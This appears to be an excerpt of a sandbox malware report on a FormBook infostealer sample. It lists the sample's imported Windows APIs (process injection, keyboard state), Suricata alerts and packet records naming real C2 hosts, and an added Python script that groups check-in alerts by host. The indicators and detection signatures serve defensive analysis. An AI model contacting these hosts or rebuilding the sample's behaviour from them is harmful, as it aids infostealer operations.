IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T15:49:40.688943+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.10 | 49764 | TCP
2024-11-07T15:50:19.138094+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.10 | 49972 | TCP
2024-11-07T15:50:22.133740+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49973 | 3.33.130.190 | 80 | TCP
2024-11-07T15:50:38.685584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49974 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:41.368303+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49975 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:43.915878+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49976 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:46.527094+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49977 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:53.605281+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49978 | 195.154.200.15 | 80 | TCP
2024-11-07T15:50:56.152178+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49979 | 195.154.200.15 | 80 | TCP
2024-11-07T15:50:58.699230+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49980 | 195.154.200.15 | 80 | TCP
2024-11-07T15:51:01.318763+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49981 | 195.154.200.15 | 80 | TCP
2024-11-07T15:51:08.087996+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49982 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:10.730228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49983 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:13.264976+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49984 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:15.803730+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49985 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:22.206440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49986 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:25.339847+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49987 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:27.862211+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49988 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:30.408170+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49989 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:36.985157+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49990 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:39.476121+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49991 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:42.025674+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49992 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:44.728604+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49993 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:51.011005+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49994 | 103.249.106.91 | 80 | TCP
2024-11-07T15:51:53.901727+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49995 | 103.249.106.91 | 80 | TCP
2024-11-07T15:51:55.979857+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49996 | 103.249.106.91 | 80 | TCP
2024-11-07T15:51:58.510867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49997 | 103.249.106.91 | 80 | TCP
2024-11-07T15:52:04.770948+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49998 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:07.365670+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49999 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:09.870607+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50000 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:12.410015+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50001 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:19.727445+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50002 | 156.234.28.94 | 80 | TCP
2024-11-07T15:52:22.121733+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50003 | 156.234.28.94 | 80 | TCP
2024-11-07T15:52:24.713799+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 50004 | 156.234.28.94 | 80 | TCP
2024-11-07T15:52:27.157159+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 50005 | 156.234.28.94 | 80 | TCP
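Read host by host, the alert table shows a fixed rhythm: after a single GET check-in to the first host, every subsequent destination receives three POST check-ins (SID 2855464) followed by one GET check-in (SID 2855465), roughly eight seconds per host, before the sample moves on to the next IP on port 80. The two ET EXPLOIT rows at the top are a different signature entirely, matched on inbound port-443 traffic from hosts that never appear in the check-in list, and should not be read as part of the C2 activity. The script below is an added example, not part of the Joe Sandbox report; its ALERTS text is constructed from the first three check-in hosts of the table above (plus one ET EXPLOIT row to show the filter), rewritten as tab-separated fields, and the "full cycle" pattern it looks for is the POST x3 + GET sequence visible in this report, not a general FormBook specification.

```python
"""Group Suricata FormBook check-in alerts by destination host to expose the
rotation pattern (POST, POST, POST, GET per host, then the next host).

Added example, not code from the Joe Sandbox report.  ALERTS is constructed
from the alert table of this report: the first three check-in destinations
plus one unrelated ET EXPLOIT row, as tab-separated
timestamp / SID / signature / dest IP / dest port.
"""
from collections import OrderedDict
from datetime import datetime
import re

ALERTS = """\
2024-11-07T15:49:40.688943+0100\t2022930\tET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow\t192.168.2.10\t49764
2024-11-07T15:50:22.133740+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t3.33.130.190\t80
2024-11-07T15:50:38.685584+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.64.118.221\t80
2024-11-07T15:50:41.368303+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.64.118.221\t80
2024-11-07T15:50:43.915878+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t192.64.118.221\t80
2024-11-07T15:50:46.527094+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t192.64.118.221\t80
2024-11-07T15:50:53.605281+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t195.154.200.15\t80
2024-11-07T15:50:56.152178+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t195.154.200.15\t80
2024-11-07T15:50:58.699230+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t195.154.200.15\t80
2024-11-07T15:51:01.318763+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t195.154.200.15\t80
"""

# Only the FormBook check-in signatures carry the HTTP method we key on.
CHECKIN_SIG = re.compile(r"FormBook CnC Checkin \((GET|POST)\) M(\d)")
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"  # %z accepts the report's "+0100" form

# The per-host sequence observed in this report.
FULL_CYCLE = ["POST", "POST", "POST", "GET"]


def parse_checkins(text):
    """Return FormBook check-in alerts as dicts; every other signature is dropped."""
    rows = []
    for line in text.strip().splitlines():
        ts, sid, sig, dst_ip, dst_port = line.split("\t")
        m = CHECKIN_SIG.search(sig)
        if m is None:
            continue  # e.g. the ET EXPLOIT row: not a check-in, not a C2 host
        rows.append({
            "ts": datetime.strptime(ts, TS_FORMAT),
            "sid": int(sid),
            "method": m.group(1),
            "variant": "M" + m.group(2),
            "dst": dst_ip,
            "port": int(dst_port),
        })
    return rows


def sequence_by_host(rows):
    """dst_ip -> list of HTTP methods, hosts kept in first-seen order."""
    seq = OrderedDict()
    for r in rows:
        seq.setdefault(r["dst"], []).append(r["method"])
    return seq


def hosts_with_full_cycle(rows):
    """Hosts that received the complete POST x3 + GET cycle."""
    return [h for h, methods in sequence_by_host(rows).items() if methods == FULL_CYCLE]


def cycle_seconds(rows):
    """dst_ip -> seconds between the first and last check-in alert to that host."""
    first, last = {}, {}
    for r in rows:
        first.setdefault(r["dst"], r["ts"])
        last[r["dst"]] = r["ts"]
    return {h: (last[h] - first[h]).total_seconds() for h in first}


def summary(text=ALERTS):
    """One dict a triage note can quote: hosts, which completed a cycle, cadence."""
    rows = parse_checkins(text)
    return {
        "hosts": list(sequence_by_host(rows)),
        "full_cycle": hosts_with_full_cycle(rows),
        "cycle_seconds": {h: round(s, 1) for h, s in cycle_seconds(rows).items()},
    }


if __name__ == "__main__":
    for host, methods in sequence_by_host(parse_checkins(ALERTS)).items():
        print(f"{host:>16}  {' '.join(methods)}")
```

Fed the full table instead of the three-host subset, `hosts_with_full_cycle` returns the remaining seven port-80 destinations as well; `3.33.130.190`, which only ever received the single GET, stays out of that list, and the ET EXPLOIT rows never reach the per-host grouping at all.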
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 15:50:20.257916927 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:20.262881994 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:20.266227007 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:20.273966074 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:20.278892994 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:22.133512974 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:22.133532047 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:22.133549929 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:22.133559942 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:22.133739948 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:22.133758068 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:22.133764029 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:22.137053013 CET | 49973 | 80 | 192.168.2.10 | 3.33.130.190
Nov 7, 2024 15:50:22.142782927 CET | 80 | 49973 | 3.33.130.190 | 192.168.2.10
Nov 7, 2024 15:50:37.939475060 CET | 49974 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:37.944628954 CET | 80 | 49974 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:37.946710110 CET | 49974 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:37.962073088 CET | 49974 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:37.967148066 CET | 80 | 49974 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:38.646874905 CET | 80 | 49974 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:38.685492039 CET | 80 | 49974 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:38.685584068 CET | 49974 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:39.464828968 CET | 49974 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:40.630637884 CET | 49975 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:40.635796070 CET | 80 | 49975 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:40.635915995 CET | 49975 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:40.648349047 CET | 49975 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:40.653310061 CET | 80 | 49975 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:41.329152107 CET | 80 | 49975 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:41.367614985 CET | 80 | 49975 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:41.368303061 CET | 49975 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:42.152442932 CET | 49975 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:43.181077003 CET | 49976 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:43.185976028 CET | 80 | 49976 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:43.186072111 CET | 49976 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:43.223819971 CET | 49976 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:43.229000092 CET | 80 | 49976 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:43.229800940 CET | 80 | 49976 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:43.877651930 CET | 80 | 49976 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:43.915818930 CET | 80 | 49976 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:43.915878057 CET | 49976 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:44.730390072 CET | 49976 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:45.785388947 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:45.790615082 CET | 80 | 49977 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:45.790725946 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:45.798866987 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:45.803817034 CET | 80 | 49977 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:46.482928991 CET | 80 | 49977 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:46.527093887 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:46.556587934 CET | 80 | 49977 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:46.556729078 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:46.559767962 CET | 49977 | 80 | 192.168.2.10 | 192.64.118.221
Nov 7, 2024 15:50:46.564814091 CET | 80 | 49977 | 192.64.118.221 | 192.168.2.10
Nov 7, 2024 15:50:52.073261023 CET | 49978 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:52.079869986 CET | 80 | 49978 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:52.080003023 CET | 49978 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:52.097975016 CET | 49978 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:52.104789019 CET | 80 | 49978 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:53.605281115 CET | 49978 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:53.610752106 CET | 80 | 49978 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:53.610822916 CET | 49978 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:54.623971939 CET | 49979 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:54.632364988 CET | 80 | 49979 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:54.632528067 CET | 49979 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:54.643986940 CET | 49979 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:54.652370930 CET | 80 | 49979 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:56.152178049 CET | 49979 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:56.158176899 CET | 80 | 49979 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:56.158308029 CET | 49979 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:57.171211004 CET | 49980 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:57.176290035 CET | 80 | 49980 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:57.176433086 CET | 49980 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:57.188424110 CET | 49980 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:57.193317890 CET | 80 | 49980 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:57.193774939 CET | 80 | 49980 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:58.699229956 CET | 49980 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:58.704549074 CET | 80 | 49980 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:58.704811096 CET | 49980 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:59.718319893 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:59.723346949 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:50:59.723424911 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:59.730701923 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:50:59.735682964 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:51:01.318531990 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:51:01.318639040 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:51:01.318763018 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:51:01.426367044 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:51:01.426575899 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:51:01.429650068 CET | 49981 | 80 | 192.168.2.10 | 195.154.200.15
Nov 7, 2024 15:51:01.434811115 CET | 80 | 49981 | 195.154.200.15 | 192.168.2.10
Nov 7, 2024 15:51:06.923065901 CET | 49982 | 80 | 192.168.2.10 | 168.76.221.252
Nov 7, 2024 15:51:06.928002119 CET | 80 | 49982 | 168.76.221.252 | 192.168.2.10
Nov 7, 2024 15:51:06.928071976 CET | 49982 | 80 | 192.168.2.10 | 168.76.221.252
Nov 7, 2024 15:51:06.939676046 CET | 49982 | 80 | 192.168.2.10 | 168.76.221.252
Nov 7, 2024 15:51:06.944520950 CET | 80 | 49982 | 168.76.221.252 | 192.168.2.10
Nov 7, 2024 15:51:08.087949038 CET | 80 | 49982 | 168.76.221.252 | 192.168.2.10
Nov 7, 2024 15:51:08.087996006 CET | 49982 | 80 | 192.168.2.10 | 168.76.221.252
Nov 7, 2024 15:51:08.448868036 CET | 49982 | 80 | 192.168.2.10 | 168.76.221.252
